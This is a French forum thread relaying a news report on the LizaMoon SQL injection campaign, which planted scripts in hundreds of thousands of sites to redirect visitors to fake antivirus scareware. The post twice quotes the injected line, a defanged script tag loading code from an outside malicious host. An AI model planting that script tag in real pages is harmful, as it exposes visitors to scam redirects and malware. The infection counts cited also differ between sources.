LizaMoon : la plus grande attaque par injection SQL?

  • Initiateur de la discussion Initiateur de la discussion el jadida
  • Date de début Date de début
el jadida

el jadida

el jadida/mazagan beach
L’éditeur de solutions de sécurité Websense a repéré une attaque informatique par injection dans les bases de données SQL baptisée LizaMoon. Ce serait la plus grande attaque de cette nature jamais lancée sur le web.

Ne vous fiez pas au doux nom de l’attaque, LizaMoon. Elle pourrait être l’attaque par injection SQL de la plus grande ampleur jamais connue. Repérée le 29 mars, elle avait déjà infecté 28 000 sites web. Au fur et à mesure des jours, ce chiffre n’a cessé de grimper, passant de 28 000 à 226 000, puis finalement à environ 1,530 million.

Ce qui se passe pour les internautes : ils sont redirigés vers une page web puis avertis qu’ils sont victimes d’un malware sur leur ordinateur. On leur propose alors les services d’un faux antivirus, appelé « scareware ».

Parmi les nombreux sites web infectés, la moitié seraient américains. Mais on compte notamment iTunes, qui heureusement encode les balises de script, et interdit l’exécution du script malveillant.

Websense n’est pas vraiment optimiste quant à l’éradication de cette menace. Il note qu’une attaque similaire (de moins grande ampleur) avait eu lieu en 2009, et que nous en voyons encore des traces sur le web.

L'éditeur a mis en ligne une vidéo d(ci-dessous) ans laquelle il explique le fonctionnement de l'attaque :
 
Une simple ligne de code

Les chercheurs de WebSense ont indiqué avoir été prévenus par des personnes qui avaient détecté ce code malveillant dans leur base de données Microsoft SQL Server 2003 et 2005. Il s'agit d'une simple ligne de code (<script src=hxxp://lizamoon.com/ur.php></script>) qui est injectée dans le site et déclenche une redirection vers une page piégée.

Selon le dernier recensement effectué au cours du weekend, plus de 550.000 Url étaient déjà contaminés. (Eureka Presse)
 
Une simple ligne de code

Les chercheurs de WebSense ont indiqué avoir été prévenus par des personnes qui avaient détecté ce code malveillant dans leur base de données Microsoft SQL Server 2003 et 2005. Il s'agit d'une simple ligne de code (<script src=hxxp://lizamoon.com/ur.php></script>) qui est injectée dans le site et déclenche une redirection vers une page piégée.

Selon le dernier recensement effectué au cours du weekend, plus de 550.000 Url étaient déjà contaminés. (Eureka Presse).....
 
Retour
Haut